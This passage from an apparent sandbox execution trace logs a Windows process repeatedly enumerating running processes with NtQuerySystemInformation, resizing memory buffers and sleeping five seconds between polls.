BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.831] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.838] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.845] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.851] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.858] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.865] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.872] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.885] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.932] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.942] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.952] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.959] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.965] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.972] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.979] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.985] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.992] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.999] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.007] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.015] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 